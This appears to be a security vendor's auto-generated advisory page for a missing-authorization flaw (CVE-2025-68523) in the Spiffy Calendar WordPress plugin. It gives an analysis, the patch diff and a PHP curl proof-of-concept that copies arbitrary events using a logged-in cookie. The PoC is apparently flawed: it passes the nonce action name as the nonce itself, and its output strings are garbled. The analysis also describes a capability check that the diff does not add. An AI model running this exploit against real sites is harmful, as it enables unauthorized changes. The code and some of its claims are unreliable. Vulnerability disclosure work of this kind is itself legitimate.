Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : March 18, 2026

CVE-2025-68523: Spiffy Calendar <= 5.0.7 – Missing Authorization (spiffy-calendar)

CVE ID CVE-2025-68523
Plugin spiffy-calendar
Severity Medium (CVSS 4.3)
CWE 862
Vulnerable Version 5.0.7
Patched Version 5.0.8
Disclosed January 4, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-68523:
The Spiffy Calendar WordPress plugin contains a missing authorization vulnerability in its event copy functionality. This flaw allows authenticated attackers with Contributor-level permissions or higher to copy calendar events without proper capability checks. The vulnerability affects all plugin versions up to and including 5.0.7, with a CVSS score of 4.3 indicating medium severity.

The root cause is an insufficient nonce verification mechanism in the event copy handler. The vulnerable code in spiffy-calendar/includes/admin/custom-posts.php at line 379 uses basename(__FILE__) alone as the nonce value. This static nonce value lacks association with specific post IDs, enabling attackers to reuse nonces across different events. The copy_event() function at line 397 performs check_admin_referer() validation but does not verify the user’s capability to copy events before processing the request.

Exploitation requires an authenticated attacker with at least Contributor-level access. The attacker sends a GET request to /wp-admin/admin.php with the page parameter set to spiffy-calendar and the action parameter set to copy. The request includes the post parameter containing the target event ID and a nonce value generated from basename(__FILE__). Since the nonce is not tied to specific post IDs, attackers can copy any event by simply changing the post parameter value while reusing the same nonce.

The patch introduces two key changes. First, it modifies the nonce generation at line 379 to append the post ID: basename(__FILE__).$post->ID. Second, it updates the nonce verification at line 401 to include the post ID: check_admin_referer(basename(__FILE__).$post_id). This creates unique nonces for each event, preventing cross-ID nonce reuse. The patch also adds explicit post ID retrieval before nonce verification to ensure proper parameter validation.

Successful exploitation allows attackers to duplicate any calendar event regardless of ownership or permissions. This can lead to unauthorized data duplication, event manipulation, and potential privilege escalation if copied events contain administrative metadata. While the vulnerability requires Contributor-level access, it bypasses the intended authorization checks that should restrict users to copying only their own events.

Differential between vulnerable and patched code

Code Diff 
--- a/spiffy-calendar/includes/admin/custom-posts.php
+++ b/spiffy-calendar/includes/admin/custom-posts.php
@@ -379,7 +379,7 @@
 					),
 					'admin.php'
 				),
-				basename(__FILE__),
+				basename(__FILE__).$post->ID,
 			);

 			$actions[ 'copy' ] = '<a href="' . esc_url( $url ) . '" title="' . __('Copy','spiffy-calendar') . '">' . __('Copy','spiffy-calendar') . '</a>';
@@ -397,10 +397,13 @@
 			wp_die( __('Bad copy request', 'spiffy-calendar') );
 		}

+		// Get the original post ID
+		$post_id = absint( $_GET[ 'post' ] );
+
 		// Nonce verification
-		check_admin_referer( basename( __FILE__ ) );
+		check_admin_referer( basename( __FILE__ ).$post_id );

-		// Get the original post ID and data
+		// Get the original post data
 		$post_id = absint( $_GET[ 'post' ] );
 		$post = get_post( $post_id );

--- a/spiffy-calendar/spiffy-calendar.php
+++ b/spiffy-calendar/spiffy-calendar.php
@@ -3,7 +3,7 @@
 Plugin Name: Spiffy Calendar
 Plugin URI:  http://www.spiffyplugins.ca/spiffycalendar
 Description: A full featured, simple to use Spiffy Calendar plugin for WordPress that allows you to manage and display your events and appointments.
-Version:     5.0.7
+Version:     5.0.8
 Author:      Spiffy Plugins
 Author URI:  http://spiffyplugins.ca
 License:     GPL2

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC 
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-68523 - Spiffy Calendar <= 5.0.7 - Missing Authorization

<?php

$target_url = 'https://example.com/wp-admin/admin.php';
$cookie = 'wordpress_logged_in_123=...';

// Configuration
$post_id = 123; // Target event ID to copy

// Step 1: Get the nonce from the events list page
$list_url = $target_url . '?page=spiffy-calendar';
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $list_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIE, $cookie);
$response = curl_exec($ch);

// Extract nonce from copy link (nonce is basename(__FILE__) = 'custom-posts.php')
$nonce = 'custom-posts.php';

// Step 2: Perform unauthorized copy action
$copy_url = $target_url . '?page=spiffy-calendar&action=copy&post=' . $post_id . '&_wpnonce=' . $nonce;

curl_setopt($ch, CURLOPT_URL, $copy_url);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$copy_response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);

if ($http_code == 200 && strpos($copy_response, 'Event copied') !== false) {
    echo "Successfully copied event ID: $post_idn";
} else {
    echo "Copy failed. HTTP code: $http_coden";
}

curl_close($ch);

?>

Frequently Asked Questions

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations

Trusted by Developers
Blac&kMcDonaldCovenant House TorontoAlzheimer Society CanadaUniversity of TorontoHarvard Medical School